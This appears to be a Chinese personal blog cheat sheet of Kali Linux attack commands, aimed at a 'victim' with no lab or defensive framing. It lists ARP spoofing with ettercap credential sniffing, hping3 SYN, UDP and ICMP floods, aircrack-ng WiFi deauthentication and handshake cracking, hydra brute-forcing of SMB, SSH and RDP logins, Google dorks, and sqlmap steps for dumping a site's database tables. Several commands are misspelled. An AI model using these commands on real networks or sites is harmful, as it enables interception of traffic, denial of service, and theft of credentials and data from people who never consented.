目 录CONTENT

文章目录

Kali Linux 的基本工具使用以及sqlmap注入

Celia
2022-10-27 / 0 评论 / 1 点赞 / 82 阅读 / 801 字 / 正在检测是否收录...

使用之前请更新镜像源

kali镜像源

内网工具集使用

捕获网卡中的http图片

driftnet -i eth0 

捕获账号密码

ettercap -Tq -i eth0

开启流量转发

echo 1 > /proc/sys/net/ipv4/ip_forward

查看转发

cat /proc/sys/net/ipv4/ip_forward

arp欺骗

arpspoof -i eth0 -t 192.168.受害者 192.168.网关

ping欺骗受害者假MAC

arping -s 伪造的MAC地址6位 -S 192.168.网关 192.168.受害者

占满对方带宽不一定有效SYN攻击方式TCP

hping3 --flood -S --rand-source -p 端口 受害者IP

udp攻击无需对方建立连接不一定有效原理如上

hping3 --rand-source --udp -p 端口 --flood 受害者IP

icmp攻击方式但是最大数据只能1400

hping3 --flood --rand-source --icmp -d 1400 受害者ip

web测试压力 cc攻击模拟1000人并发

ab -n 数据数量 -c 并发多少人  网页链接

启动服务

启动v2

systeam start v2ray

启动NGINX

systeam start nginx

扫描类

收集域名信息

dig @dns

路由跟踪

traceroute

局域网ip扫描

netdiscover

WiFi类工具

aircrack-ng

开启监听模式

airmon-ng start wlan0

查看监听

airmon-ng

查看附近WiFi

airodump-ng wlan0mon

抓取握手包

airodump-ng -c 信道 --bssid 指定mac地址 -w 指定握手包保存位置 wlan0mon 

强制断开重新连接获取握手包

aireplay-ng -0 攻击次数 -a 设备BSSID  wlan0mon

开始跑包

aircarck-ng -a2 -b 目标设备BSSID -w 字典 /tmp/1
aireplay-ng -3 -b 目标BSSID -h 在链接的设备 wlan0mon desktop桌面

hydra九头蛇暴力破解密码类

l 指定单个用户名
-L指定单个用户名字典
-p指定单个密码
-P指定单个密码字典
-s 端口
-vV显示详细
-t 线程数默认16
-r 反向登录
-e nsr 参数
-n 没有密码的账户
-R 继续上一次破解
hybra -l administrator -P 密码字典目录 smb://目标ip -vV
sshliunx远程服务22
rdp远程服务3389
smb文件共享445
mysql数据库3306

VIM

i 进入编辑模式
I 直接到首行输入
A直接到尾部输出
o到下一行进行输入
O到上一行进行输入
/ 向前查找
?向后进行查找
dd 删除一整行
shift+zz 保存并退出

sql注入类

inurl:asp?=id=1
inurl:php?=id=1
sqlmap -u 网站url 找到注入点
sqlmap -u 网页链接 --dbs 扫描到几个数据
sqlmap -u url -D 数据库名 --tables 扫描表
sqlmap -u url -D 数据库name -T 表名 --columns 扫描字段
qlmap -u url -D 数据库name -T 表名 -C 列名 --dump 1
sqlmap -u url -D 数据库name -T 表名 -C content --dump 2
show databases 查看所有数据库
order by
and 1=2 union select 1, version() 查询数据库版本
use dvwa使用库
select database()查看默认库
show tables 查看所有表
desc 表 查看表结构
show create table users\G 查看创建表sql语句
select user() 查看当前默认用户
select * from users\G; 以字段的方式查看所有users表
select * from information_schema.TABLES\G
select * from information_schema.COLUMNS\G
TABLE_SCHEMA 数据库名
TABLE_NMAE 表名
COLUMN_NAME 列名
distinct 过滤
sqlmap --batch -u 地址?id=1

1

评论区